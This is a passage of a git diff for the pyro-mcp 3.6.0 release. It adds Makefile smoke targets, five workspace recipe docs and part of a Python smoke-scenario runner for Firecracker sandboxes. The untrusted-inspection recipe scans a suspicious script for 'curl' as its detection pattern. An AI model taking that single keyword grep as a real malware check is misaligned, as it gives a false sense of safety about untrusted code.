diff --git a/CHANGELOG.md b/CHANGELOG.md index e641fc9..dbca7a1 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,6 +2,16 @@ All notable user-visible changes to `pyro-mcp` are documented here. +## 3.6.0 + +- Added `docs/use-cases/` with five concrete workspace recipes for cold-start validation, + repro-plus-fix loops, parallel workspaces, untrusted inspection, and review/eval workflows. +- Added real guest-backed smoke packs for those stories with `make smoke-use-cases` plus one + `make smoke-...` target per scenario, all backed by the shared + `scripts/workspace_use_case_smoke.py` runner. +- Updated the main docs so the stable workspace walkthrough now points directly at the recipe set + and the smoke packs as the next step after first-run validation. + ## 3.5.0 - Added chat-friendly shell reads with `--plain` and `--wait-for-idle-ms` across the CLI, diff --git a/Makefile b/Makefile index c1ccc4b..1b8ffa1 100644 --- a/Makefile +++ b/Makefile @@ -14,8 +14,10 @@ RUNTIME_ENVIRONMENTS ?= debian:12-base debian:12 debian:12-build PYPI_DIST_DIR ?= dist TWINE_USERNAME ?= __token__ PYPI_REPOSITORY_URL ?= +USE_CASE_ENVIRONMENT ?= debian:12 +USE_CASE_SMOKE_FLAGS ?= -.PHONY: help setup lint format typecheck test check dist-check pypi-publish demo network-demo doctor ollama ollama-demo run-server install-hooks runtime-bundle runtime-binaries runtime-kernel runtime-rootfs runtime-agent runtime-validate runtime-manifest runtime-sync runtime-clean runtime-fetch-binaries runtime-build-kernel-real runtime-build-rootfs-real runtime-materialize runtime-export-environment-oci runtime-export-official-environments-oci runtime-publish-environment-oci runtime-publish-official-environments-oci runtime-boot-check runtime-network-check +.PHONY: help setup lint format typecheck test check dist-check pypi-publish demo network-demo doctor ollama ollama-demo run-server install-hooks smoke-use-cases smoke-cold-start-validation smoke-repro-fix-loop smoke-parallel-workspaces 
smoke-untrusted-inspection smoke-review-eval runtime-bundle runtime-binaries runtime-kernel runtime-rootfs runtime-agent runtime-validate runtime-manifest runtime-sync runtime-clean runtime-fetch-binaries runtime-build-kernel-real runtime-build-rootfs-real runtime-materialize runtime-export-environment-oci runtime-export-official-environments-oci runtime-publish-environment-oci runtime-publish-official-environments-oci runtime-boot-check runtime-network-check help: @printf '%s\n' \ @@ -32,6 +34,12 @@ help: ' demo Run the deterministic VM demo' \ ' network-demo Run the deterministic VM demo with guest networking enabled' \ ' doctor Show runtime and host diagnostics' \ + ' smoke-use-cases Run all real guest-backed workspace use-case smokes' \ + ' smoke-cold-start-validation Run the cold-start repo validation smoke' \ + ' smoke-repro-fix-loop Run the repro-plus-fix loop smoke' \ + ' smoke-parallel-workspaces Run the parallel isolated workspaces smoke' \ + ' smoke-untrusted-inspection Run the unsafe or untrusted inspection smoke' \ + ' smoke-review-eval Run the review and evaluation workflow smoke' \ ' ollama-demo Run the network-enabled Ollama lifecycle demo' \ ' run-server Run the MCP server' \ ' install-hooks Install pre-commit hooks' \ @@ -104,6 +112,24 @@ network-demo: doctor: uv run pyro doctor +smoke-use-cases: + uv run python scripts/workspace_use_case_smoke.py --scenario all --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-cold-start-validation: + uv run python scripts/workspace_use_case_smoke.py --scenario cold-start-validation --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-repro-fix-loop: + uv run python scripts/workspace_use_case_smoke.py --scenario repro-fix-loop --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-parallel-workspaces: + uv run python scripts/workspace_use_case_smoke.py --scenario parallel-workspaces --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + 
+smoke-untrusted-inspection: + uv run python scripts/workspace_use_case_smoke.py --scenario untrusted-inspection --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + +smoke-review-eval: + uv run python scripts/workspace_use_case_smoke.py --scenario review-eval --environment "$(USE_CASE_ENVIRONMENT)" $(USE_CASE_SMOKE_FLAGS) + ollama: ollama-demo ollama-demo: diff --git a/README.md b/README.md index 7b56dad..40e310f 100644 --- a/README.md +++ b/README.md @@ -18,11 +18,12 @@ It exposes the same runtime in three public forms: - Vision: [docs/vision.md](docs/vision.md) - Workspace GA roadmap: [docs/roadmap/task-workspace-ga.md](docs/roadmap/task-workspace-ga.md) - LLM chat roadmap: [docs/roadmap/llm-chat-ergonomics.md](docs/roadmap/llm-chat-ergonomics.md) +- Use-case recipes: [docs/use-cases/README.md](docs/use-cases/README.md) - First run transcript: [docs/first-run.md](docs/first-run.md) - Stable workspace walkthrough GIF: [docs/assets/workspace-first-run.gif](docs/assets/workspace-first-run.gif) - Terminal walkthrough GIF: [docs/assets/first-run.gif](docs/assets/first-run.gif) - PyPI package: [pypi.org/project/pyro-mcp](https://pypi.org/project/pyro-mcp/) -- What's new in 3.5.0: [CHANGELOG.md#350](CHANGELOG.md#350) +- What's new in 3.6.0: [CHANGELOG.md#360](CHANGELOG.md#360) - Host requirements: [docs/host-requirements.md](docs/host-requirements.md) - Integration targets: [docs/integrations.md](docs/integrations.md) - Public contract: [docs/public-contract.md](docs/public-contract.md) @@ -59,7 +60,7 @@ What success looks like: ```bash Platform: linux-x86_64 Runtime: PASS -Catalog version: 3.5.0 +Catalog version: 3.6.0 ... [pull] phase=install environment=debian:12 [pull] phase=ready environment=debian:12 @@ -81,6 +82,11 @@ access to `registry-1.docker.io`, and needs local cache space for the guest imag agent needs one sandbox to stay alive across repeated commands, shells, services, checkpoints, diffs, exports, and reset. 
+After that stable walkthrough works, continue with the recipe set in +[docs/use-cases/README.md](docs/use-cases/README.md). It packages the five core workspace stories +into documented flows plus real guest-backed smoke targets such as `make smoke-use-cases` and +`make smoke-repro-fix-loop`. + The commands below use plain `pyro ...`. Run the same flow with `uvx --from pyro-mcp pyro ...` for the published package, or `uv run pyro ...` from a source checkout. @@ -189,7 +195,7 @@ uvx --from pyro-mcp pyro env list Expected output: ```bash -Catalog version: 3.5.0 +Catalog version: 3.6.0 debian:12 [installed|not installed] Debian 12 environment with Git preinstalled for common agent workflows. debian:12-base [installed|not installed] Minimal Debian 12 environment for shell and core Unix tooling. debian:12-build [installed|not installed] Debian 12 environment with Git and common build tools preinstalled. @@ -305,7 +311,7 @@ Persistent workspaces start in `/workspace` and keep command history until you d machine consumption, add `--json` and read the returned `workspace_id`. Use `--seed-path` when you want the workspace to start from a host directory or a local `.tar` / `.tar.gz` / `.tgz` archive instead of an empty workspace. Use `pyro workspace sync push` when you want to import -later host-side changes into a started workspace. Sync is non-atomic in `3.5.0`; if it fails +later host-side changes into a started workspace. Sync is non-atomic in `3.6.0`; if it fails partway through, prefer `pyro workspace reset` to recover from `baseline` or one named snapshot. Use `pyro workspace diff` to compare the live `/workspace` tree to its immutable create-time baseline, and `pyro workspace export` to copy one changed file or directory back to the host. 
Use diff --git a/docs/first-run.md b/docs/first-run.md index d943ed4..839740e 100644 --- a/docs/first-run.md +++ b/docs/first-run.md @@ -22,7 +22,7 @@ Networking: tun=yes ip_forward=yes ```bash $ uvx --from pyro-mcp pyro env list -Catalog version: 3.5.0 +Catalog version: 3.6.0 debian:12 [installed|not installed] Debian 12 environment with Git preinstalled for common agent workflows. debian:12-base [installed|not installed] Minimal Debian 12 environment for shell and core Unix tooling. debian:12-build [installed|not installed] Debian 12 environment with Git and common build tools preinstalled. @@ -121,6 +121,10 @@ $ uvx --from pyro-mcp pyro mcp serve --profile workspace-core `pyro demo` proves the one-shot create/start/exec/delete VM lifecycle works end to end. +Once that stable workspace flow works, continue with the five recipe docs in +[use-cases/README.md](use-cases/README.md) or run the real guest-backed smoke packs directly with +`make smoke-use-cases`. + When you need repeated commands in one sandbox, switch to `pyro workspace ...`: ```bash @@ -252,7 +256,7 @@ State: started Use `--seed-path` when the workspace should start from a host directory or a local `.tar` / `.tar.gz` / `.tgz` archive instead of an empty `/workspace`. Use `pyro workspace sync push` when you need to import later host-side changes into a started -workspace. Sync is non-atomic in `3.5.0`; if it fails partway through, prefer `pyro workspace reset` +workspace. Sync is non-atomic in `3.6.0`; if it fails partway through, prefer `pyro workspace reset` to recover from `baseline` or one named snapshot. 
Use `pyro workspace diff` to compare the current `/workspace` tree to its immutable create-time baseline, `pyro workspace snapshot *` to create named checkpoints, and `pyro workspace export` to copy one changed file or directory back to the diff --git a/docs/install.md b/docs/install.md index 2e168b0..0327eac 100644 --- a/docs/install.md +++ b/docs/install.md @@ -85,7 +85,7 @@ uvx --from pyro-mcp pyro env list Expected output: ```bash -Catalog version: 3.5.0 +Catalog version: 3.6.0 debian:12 [installed|not installed] Debian 12 environment with Git preinstalled for common agent workflows. debian:12-base [installed|not installed] Minimal Debian 12 environment for shell and core Unix tooling. debian:12-build [installed|not installed] Debian 12 environment with Git and common build tools preinstalled. @@ -167,6 +167,11 @@ This is the stable persistent-workspace contract: - `workspace export` copies results back to the host - `workspace stop|start` and `workspace disk *` add secondary stopped-workspace inspection and raw ext4 export +When that stable workspace path is working, continue with the recipe index at +[use-cases/README.md](use-cases/README.md). It groups the five core workspace stories and the +real smoke targets behind them, starting with `make smoke-use-cases` or one of the per-scenario +targets such as `make smoke-repro-fix-loop`. + ## 6. Optional demo proof point ```bash @@ -274,7 +279,7 @@ Workspace commands default to the persistent `/workspace` directory inside the g the identifier programmatically, use `--json` and read the `workspace_id` field. Use `--seed-path` when the workspace should start from a host directory or a local `.tar` / `.tar.gz` / `.tgz` archive. Use `pyro workspace sync push` for later host-side changes to a started workspace. 
Sync -is non-atomic in `3.5.0`; if it fails partway through, prefer `pyro workspace reset` to recover +is non-atomic in `3.6.0`; if it fails partway through, prefer `pyro workspace reset` to recover from `baseline` or one named snapshot. Use `pyro workspace diff` to compare the current workspace tree to its immutable create-time baseline, `pyro workspace snapshot *` to capture named checkpoints, and `pyro workspace export` to copy one changed file or directory back to the host. Use diff --git a/docs/integrations.md b/docs/integrations.md index b25ab3c..22da086 100644 --- a/docs/integrations.md +++ b/docs/integrations.md @@ -43,6 +43,7 @@ Canonical example: - [examples/openai_responses_vm_run.py](../examples/openai_responses_vm_run.py) - [examples/openai_responses_workspace_core.py](../examples/openai_responses_workspace_core.py) +- [docs/use-cases/repro-fix-loop.md](use-cases/repro-fix-loop.md) ## MCP Clients @@ -67,6 +68,7 @@ Starter config: - [examples/mcp_client_config.md](../examples/mcp_client_config.md) - [examples/claude_desktop_mcp_config.json](../examples/claude_desktop_mcp_config.json) - [examples/cursor_mcp_config.json](../examples/cursor_mcp_config.json) +- [docs/use-cases/README.md](use-cases/README.md) ## Direct Python SDK @@ -123,6 +125,7 @@ Examples: - [examples/python_lifecycle.py](../examples/python_lifecycle.py) - [examples/python_workspace.py](../examples/python_workspace.py) - [examples/python_shell.py](../examples/python_shell.py) +- [docs/use-cases/README.md](use-cases/README.md) ## Agent Framework Wrappers diff --git a/docs/roadmap/llm-chat-ergonomics.md b/docs/roadmap/llm-chat-ergonomics.md index 3277df2..6725c3c 100644 --- a/docs/roadmap/llm-chat-ergonomics.md +++ b/docs/roadmap/llm-chat-ergonomics.md @@ -6,7 +6,7 @@ goal: make the core agent-workspace use cases feel trivial from a chat-driven LLM interface. 
-Current baseline is `3.5.0`: +Current baseline is `3.6.0`: - the stable workspace contract exists across CLI, SDK, and MCP - one-shot `pyro run` still exists as the narrow entrypoint @@ -49,7 +49,7 @@ More concretely, the model should not need to: 2. [`3.3.0` Workspace Naming And Discovery](llm-chat-ergonomics/3.3.0-workspace-naming-and-discovery.md) - Done 3. [`3.4.0` Tool Profiles And Canonical Chat Flows](llm-chat-ergonomics/3.4.0-tool-profiles-and-canonical-chat-flows.md) - Done 4. [`3.5.0` Chat-Friendly Shell Output](llm-chat-ergonomics/3.5.0-chat-friendly-shell-output.md) - Done -5. [`3.6.0` Use-Case Recipes And Smoke Packs](llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md) +5. [`3.6.0` Use-Case Recipes And Smoke Packs](llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md) - Done Completed so far: @@ -63,6 +63,9 @@ Completed so far: narrow and widen only when needed. - `3.5.0` added chat-friendly shell reads with plain-text rendering and idle batching so PTY sessions are readable enough to feed directly back into a chat model. +- `3.6.0` added recipe docs and real guest-backed smoke packs for the five core workspace use + cases so the stable product is now demonstrated as repeatable end-to-end stories instead of + only isolated feature surfaces. 
## Expected Outcome diff --git a/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md b/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md index a174528..ce213a1 100644 --- a/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md +++ b/docs/roadmap/llm-chat-ergonomics/3.6.0-use-case-recipes-and-smoke-packs.md @@ -1,6 +1,6 @@ # `3.6.0` Use-Case Recipes And Smoke Packs -Status: Planned +Status: Done ## Goal diff --git a/docs/use-cases/README.md b/docs/use-cases/README.md new file mode 100644 index 0000000..0ce0035 --- /dev/null +++ b/docs/use-cases/README.md @@ -0,0 +1,31 @@ +# Workspace Use-Case Recipes + +These recipes turn the stable workspace surface into five concrete agent flows. +They are the canonical next step after the quickstart in [install.md](../install.md) +or [first-run.md](../first-run.md). + +Run all real guest-backed scenarios locally with: + +```bash +make smoke-use-cases +``` + +Recipe matrix: + +| Use case | Recommended profile | Smoke target | Recipe | +| --- | --- | --- | --- | +| Cold-start repo validation | `workspace-full` | `make smoke-cold-start-validation` | [cold-start-repo-validation.md](cold-start-repo-validation.md) | +| Repro plus fix loop | `workspace-core` | `make smoke-repro-fix-loop` | [repro-fix-loop.md](repro-fix-loop.md) | +| Parallel isolated workspaces | `workspace-core` | `make smoke-parallel-workspaces` | [parallel-workspaces.md](parallel-workspaces.md) | +| Unsafe or untrusted code inspection | `workspace-core` | `make smoke-untrusted-inspection` | [untrusted-inspection.md](untrusted-inspection.md) | +| Review and evaluation workflows | `workspace-full` | `make smoke-review-eval` | [review-eval-workflows.md](review-eval-workflows.md) | + +All five recipes use the same real Firecracker-backed smoke runner: + +```bash +uv run python scripts/workspace_use_case_smoke.py --scenario all --environment debian:12 +``` + +That runner generates its own host fixtures, 
creates real guest-backed workspaces, +verifies the intended flow, exports one concrete result when relevant, and cleans +up on both success and failure. diff --git a/docs/use-cases/cold-start-repo-validation.md b/docs/use-cases/cold-start-repo-validation.md new file mode 100644 index 0000000..f856906 --- /dev/null +++ b/docs/use-cases/cold-start-repo-validation.md @@ -0,0 +1,38 @@ +# Cold-Start Repo Validation + +Recommended profile: `workspace-full` + +Smoke target: + +```bash +make smoke-cold-start-validation +``` + +Use this flow when an agent needs to treat a fresh repo like a new user would: +seed it into a workspace, run the validation script, keep one long-running +process alive, probe it from another command, and export a validation report. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./repo") +workspace_id = str(created["workspace_id"]) + +pyro.exec_workspace(workspace_id, command="sh validate.sh") +pyro.start_service( + workspace_id, + "app", + command="sh serve.sh", + readiness={"type": "file", "path": ".app-ready"}, +) +pyro.exec_workspace(workspace_id, command="sh -lc 'test -f .app-ready && cat service-state.txt'") +pyro.export_workspace(workspace_id, "validation-report.txt", output_path="./validation-report.txt") +pyro.delete_workspace(workspace_id) +``` + +This recipe is intentionally guest-local and deterministic. It proves startup, +service readiness, validation, and host-out report capture without depending on +external networks or private registries. 
diff --git a/docs/use-cases/parallel-workspaces.md b/docs/use-cases/parallel-workspaces.md new file mode 100644 index 0000000..ddc29b7 --- /dev/null +++ b/docs/use-cases/parallel-workspaces.md @@ -0,0 +1,43 @@ +# Parallel Isolated Workspaces + +Recommended profile: `workspace-core` + +Smoke target: + +```bash +make smoke-parallel-workspaces +``` + +Use this flow when the agent needs one isolated workspace per issue, branch, or +review thread and must rediscover the right one later. + +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +alpha = pyro.create_workspace( + environment="debian:12", + seed_path="./repo", + name="parallel-alpha", + labels={"branch": "alpha", "issue": "123"}, +) +beta = pyro.create_workspace( + environment="debian:12", + seed_path="./repo", + name="parallel-beta", + labels={"branch": "beta", "issue": "456"}, +) + +pyro.write_workspace_file(alpha["workspace_id"], "branch.txt", text="alpha\n") +pyro.write_workspace_file(beta["workspace_id"], "branch.txt", text="beta\n") +pyro.update_workspace(alpha["workspace_id"], labels={"branch": "alpha", "owner": "alice"}) +pyro.list_workspaces() +pyro.delete_workspace(alpha["workspace_id"]) +pyro.delete_workspace(beta["workspace_id"]) +``` + +The important proof here is operational, not syntactic: names, labels, list +ordering, and file contents stay isolated even when multiple workspaces are +active at the same time. diff --git a/docs/use-cases/repro-fix-loop.md b/docs/use-cases/repro-fix-loop.md new file mode 100644 index 0000000..f302974 --- /dev/null +++ b/docs/use-cases/repro-fix-loop.md @@ -0,0 +1,42 @@ +# Repro Plus Fix Loop + +Recommended profile: `workspace-core` + +Smoke target: + +```bash +make smoke-repro-fix-loop +``` + +Use this flow when the agent has to reproduce a bug, patch files without shell +quoting tricks, rerun the failing command, diff the result, export the fix, and +reset back to baseline. 
+ +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./broken-repro") +workspace_id = str(created["workspace_id"]) + +pyro.exec_workspace(workspace_id, command="sh check.sh") +pyro.read_workspace_file(workspace_id, "message.txt") +pyro.apply_workspace_patch( + workspace_id, + patch="--- a/message.txt\n+++ b/message.txt\n@@ -1 +1 @@\n-broken\n+fixed\n", +) +pyro.exec_workspace(workspace_id, command="sh check.sh") +pyro.diff_workspace(workspace_id) +pyro.export_workspace(workspace_id, "message.txt", output_path="./message.txt") +pyro.reset_workspace(workspace_id) +pyro.delete_workspace(workspace_id) +``` + +Canonical MCP/chat example: + +- [examples/openai_responses_workspace_core.py](../../examples/openai_responses_workspace_core.py) + +This is the main `workspace-core` story: model-native file ops, repeatable exec, +structured diff, explicit export, and reset-over-repair. diff --git a/docs/use-cases/review-eval-workflows.md b/docs/use-cases/review-eval-workflows.md new file mode 100644 index 0000000..eabe981 --- /dev/null +++ b/docs/use-cases/review-eval-workflows.md @@ -0,0 +1,41 @@ +# Review And Evaluation Workflows + +Recommended profile: `workspace-full` + +Smoke target: + +```bash +make smoke-review-eval +``` + +Use this flow when an agent needs to read a checklist interactively, run an +evaluation script, checkpoint or reset its changes, and export the final report. 
+ +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./review-fixture") +workspace_id = str(created["workspace_id"]) + +pyro.create_snapshot(workspace_id, "pre-review") +shell = pyro.open_shell(workspace_id) +pyro.write_shell(workspace_id, shell["shell_id"], input="cat CHECKLIST.md") +pyro.read_shell( + workspace_id, + shell["shell_id"], + plain=True, + wait_for_idle_ms=300, +) +pyro.close_shell(workspace_id, shell["shell_id"]) +pyro.exec_workspace(workspace_id, command="sh review.sh") +pyro.export_workspace(workspace_id, "review-report.txt", output_path="./review-report.txt") +pyro.reset_workspace(workspace_id, snapshot="pre-review") +pyro.delete_workspace(workspace_id) +``` + +This is the stable shell-facing story: readable PTY output for chat loops, +checkpointed evaluation, explicit export, and reset when a review branch goes +sideways. diff --git a/docs/use-cases/untrusted-inspection.md b/docs/use-cases/untrusted-inspection.md new file mode 100644 index 0000000..a089faa --- /dev/null +++ b/docs/use-cases/untrusted-inspection.md @@ -0,0 +1,34 @@ +# Unsafe Or Untrusted Code Inspection + +Recommended profile: `workspace-core` + +Smoke target: + +```bash +make smoke-untrusted-inspection +``` + +Use this flow when the agent needs to inspect suspicious code or an unfamiliar +repo without granting more capabilities than necessary. 
+ +Canonical SDK flow: + +```python +from pyro_mcp import Pyro + +pyro = Pyro() +created = pyro.create_workspace(environment="debian:12", seed_path="./suspicious-repo") +workspace_id = str(created["workspace_id"]) + +pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True) +pyro.read_workspace_file(workspace_id, "suspicious.sh") +pyro.exec_workspace( + workspace_id, + command="sh -lc \"grep -n 'curl' suspicious.sh > inspection-report.txt\"", +) +pyro.export_workspace(workspace_id, "inspection-report.txt", output_path="./inspection-report.txt") +pyro.delete_workspace(workspace_id) +``` + +This recipe stays offline-by-default, uses only explicit file reads and execs, +and exports only the inspection report the agent chose to materialize. diff --git a/pyproject.toml b/pyproject.toml index 104eb17..235df24 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [project] name = "pyro-mcp" -version = "3.5.0" +version = "3.6.0" description = "Stable Firecracker workspaces, one-shot sandboxes, and MCP tools for coding agents." 
readme = "README.md" license = { file = "LICENSE" } diff --git a/scripts/workspace_use_case_smoke.py b/scripts/workspace_use_case_smoke.py new file mode 100644 index 0000000..c35de79 --- /dev/null +++ b/scripts/workspace_use_case_smoke.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python3 + +"""Run the real guest-backed workspace use-case smoke scenarios.""" + +from pyro_mcp.workspace_use_case_smokes import main + +if __name__ == "__main__": + main() diff --git a/src/pyro_mcp/vm_environments.py b/src/pyro_mcp/vm_environments.py index b93c969..1616b6b 100644 --- a/src/pyro_mcp/vm_environments.py +++ b/src/pyro_mcp/vm_environments.py @@ -19,7 +19,7 @@ from typing import Any from pyro_mcp.runtime import DEFAULT_PLATFORM, RuntimePaths DEFAULT_ENVIRONMENT_VERSION = "1.0.0" -DEFAULT_CATALOG_VERSION = "3.5.0" +DEFAULT_CATALOG_VERSION = "3.6.0" OCI_MANIFEST_ACCEPT = ", ".join( ( "application/vnd.oci.image.index.v1+json", diff --git a/src/pyro_mcp/vm_manager.py b/src/pyro_mcp/vm_manager.py index 9bb41b0..eb90462 100644 --- a/src/pyro_mcp/vm_manager.py +++ b/src/pyro_mcp/vm_manager.py @@ -4108,7 +4108,6 @@ class VmManager: workspace.firecracker_pid = instance.firecracker_pid workspace.last_error = instance.last_error workspace.metadata = dict(instance.metadata) - self._touch_workspace_activity_locked(workspace) self._save_workspace_locked(workspace) return { "workspace_id": workspace_id, diff --git a/src/pyro_mcp/workspace_use_case_smokes.py b/src/pyro_mcp/workspace_use_case_smokes.py new file mode 100644 index 0000000..8513dce --- /dev/null +++ b/src/pyro_mcp/workspace_use_case_smokes.py @@ -0,0 +1,487 @@ +"""Canonical workspace use-case recipes and smoke scenarios.""" + +from __future__ import annotations + +import argparse +import tempfile +import time +from dataclasses import dataclass +from pathlib import Path +from typing import Callable, Final, Literal + +from pyro_mcp.api import Pyro + +DEFAULT_USE_CASE_ENVIRONMENT: Final[str] = "debian:12" +USE_CASE_SUITE_LABEL: Final[str] = 
"workspace-use-case-smoke" +USE_CASE_SCENARIOS: Final[tuple[str, ...]] = ( + "cold-start-validation", + "repro-fix-loop", + "parallel-workspaces", + "untrusted-inspection", + "review-eval", +) +USE_CASE_ALL_SCENARIO: Final[str] = "all" +USE_CASE_CHOICES: Final[tuple[str, ...]] = USE_CASE_SCENARIOS + (USE_CASE_ALL_SCENARIO,) + + +@dataclass(frozen=True) +class WorkspaceUseCaseRecipe: + scenario: str + title: str + profile: Literal["workspace-core", "workspace-full"] + smoke_target: str + doc_path: str + summary: str + + +WORKSPACE_USE_CASE_RECIPES: Final[tuple[WorkspaceUseCaseRecipe, ...]] = ( + WorkspaceUseCaseRecipe( + scenario="cold-start-validation", + title="Cold-Start Repo Validation", + profile="workspace-full", + smoke_target="smoke-cold-start-validation", + doc_path="docs/use-cases/cold-start-repo-validation.md", + summary=( + "Seed a small repo, validate it, run one long-lived service, probe it, " + "and export a report." + ), + ), + WorkspaceUseCaseRecipe( + scenario="repro-fix-loop", + title="Repro Plus Fix Loop", + profile="workspace-core", + smoke_target="smoke-repro-fix-loop", + doc_path="docs/use-cases/repro-fix-loop.md", + summary=( + "Reproduce a failure, patch it with model-native file ops, rerun, diff, " + "export, and reset." + ), + ), + WorkspaceUseCaseRecipe( + scenario="parallel-workspaces", + title="Parallel Isolated Workspaces", + profile="workspace-core", + smoke_target="smoke-parallel-workspaces", + doc_path="docs/use-cases/parallel-workspaces.md", + summary=( + "Create and manage multiple named workspaces, mutate them independently, " + "and verify isolation." + ), + ), + WorkspaceUseCaseRecipe( + scenario="untrusted-inspection", + title="Unsafe Or Untrusted Code Inspection", + profile="workspace-core", + smoke_target="smoke-untrusted-inspection", + doc_path="docs/use-cases/untrusted-inspection.md", + summary=( + "Inspect suspicious files offline-by-default, generate a report, and " + "export only explicit results." 
+ ), + ), + WorkspaceUseCaseRecipe( + scenario="review-eval", + title="Review And Evaluation Workflows", + profile="workspace-full", + smoke_target="smoke-review-eval", + doc_path="docs/use-cases/review-eval-workflows.md", + summary=( + "Walk a checklist through a PTY shell, run an evaluation, export the " + "report, and reset to a checkpoint." + ), + ), +) + +_RECIPE_BY_SCENARIO: Final[dict[str, WorkspaceUseCaseRecipe]] = { + recipe.scenario: recipe for recipe in WORKSPACE_USE_CASE_RECIPES +} +ScenarioRunner = Callable[..., None] + + +def _write_text(path: Path, text: str) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(text, encoding="utf-8") + + +def _log(message: str) -> None: + print(f"[smoke] {message}", flush=True) + + +def _create_workspace( + pyro: Pyro, + *, + environment: str, + seed_path: Path, + name: str, + labels: dict[str, str], + network_policy: str = "off", +) -> str: + created = pyro.create_workspace( + environment=environment, + seed_path=seed_path, + name=name, + labels=labels, + network_policy=network_policy, + ) + return str(created["workspace_id"]) + + +def _safe_delete_workspace(pyro: Pyro, workspace_id: str | None) -> None: + if workspace_id is None: + return + try: + pyro.delete_workspace(workspace_id) + except Exception: + return + + +def _scenario_cold_start_validation(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + export_dir = root / "export" + _write_text( + seed_dir / "README.md", + "# cold-start validation\n\nRun `sh validate.sh` and keep `sh serve.sh` alive.\n", + ) + _write_text( + seed_dir / "validate.sh", + "#!/bin/sh\n" + "set -eu\n" + "printf '%s\\n' 'validation=pass' > validation-report.txt\n" + "printf '%s\\n' 'validated'\n", + ) + _write_text( + seed_dir / "serve.sh", + "#!/bin/sh\n" + "set -eu\n" + "printf '%s\\n' 'service started'\n" + "printf '%s\\n' 'service=ready' > service-state.txt\n" + "touch .app-ready\n" + "while true; do sleep 60; done\n", + ) + 
workspace_id: str | None = None + try: + workspace_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + name="cold-start-validation", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "cold-start-validation"}, + ) + _log(f"cold-start-validation workspace_id={workspace_id}") + validation = pyro.exec_workspace(workspace_id, command="sh validate.sh") + assert int(validation["exit_code"]) == 0, validation + assert str(validation["stdout"]) == "validated\n", validation + assert str(validation["execution_mode"]) == "guest_vsock", validation + service = pyro.start_service( + workspace_id, + "app", + command="sh serve.sh", + readiness={"type": "file", "path": ".app-ready"}, + ) + assert str(service["state"]) == "running", service + probe = pyro.exec_workspace( + workspace_id, + command="sh -lc 'test -f .app-ready && cat service-state.txt'", + ) + assert probe["stdout"] == "service=ready\n", probe + logs = pyro.logs_service(workspace_id, "app", tail_lines=20) + assert "service started" in str(logs["stdout"]), logs + export_path = export_dir / "validation-report.txt" + pyro.export_workspace(workspace_id, "validation-report.txt", output_path=export_path) + assert export_path.read_text(encoding="utf-8") == "validation=pass\n" + stopped = pyro.stop_service(workspace_id, "app") + assert str(stopped["state"]) == "stopped", stopped + finally: + _safe_delete_workspace(pyro, workspace_id) + + +def _scenario_repro_fix_loop(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + export_dir = root / "export" + _write_text(seed_dir / "message.txt", "broken\n") + _write_text( + seed_dir / "check.sh", + "#!/bin/sh\n" + "set -eu\n" + "value=$(cat message.txt)\n" + "[ \"$value\" = \"fixed\" ] || {\n" + " printf 'expected fixed got %s\\n' \"$value\" >&2\n" + " exit 1\n" + "}\n" + "printf '%s\\n' \"$value\"\n", + ) + workspace_id: str | None = None + try: + workspace_id = _create_workspace( + pyro, + environment=environment, + 
def _scenario_parallel_workspaces(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Exercise two workspaces created side by side from the same seed.

    Creates ``parallel-alpha`` and ``parallel-beta`` from one seed directory,
    writes a different ``branch.txt`` into each, updates alpha's labels, and
    then asserts that each workspace kept its own file content and that
    ``list_workspaces`` reports alpha ahead of beta after alpha received the
    final write. Every workspace that was created is deleted on exit, even
    when an assertion fails part-way through.

    Args:
        pyro: Client used for every workspace operation.
        root: Scratch directory for this scenario; the seed is written to
            ``root / "seed"``.
        environment: Environment name forwarded to workspace creation.

    Raises:
        AssertionError: If any observed result differs from the expectation.
    """
    seed_dir = root / "seed"
    _write_text(seed_dir / "note.txt", "shared\n")
    workspace_ids: list[str] = []
    try:
        alpha_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_dir,
            name="parallel-alpha",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "alpha"},
        )
        # Record each id immediately so cleanup covers a partially built pair.
        workspace_ids.append(alpha_id)
        beta_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_dir,
            name="parallel-beta",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "beta"},
        )
        workspace_ids.append(beta_id)
        _log(f"parallel-workspaces alpha={alpha_id} beta={beta_id}")

        # NOTE(review): the short sleeps presumably keep per-workspace activity
        # timestamps distinct so the ordering assertion below is stable --
        # confirm against the real list_workspaces ordering rules.
        pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n")
        time.sleep(0.05)
        pyro.write_workspace_file(beta_id, "branch.txt", text="beta\n")
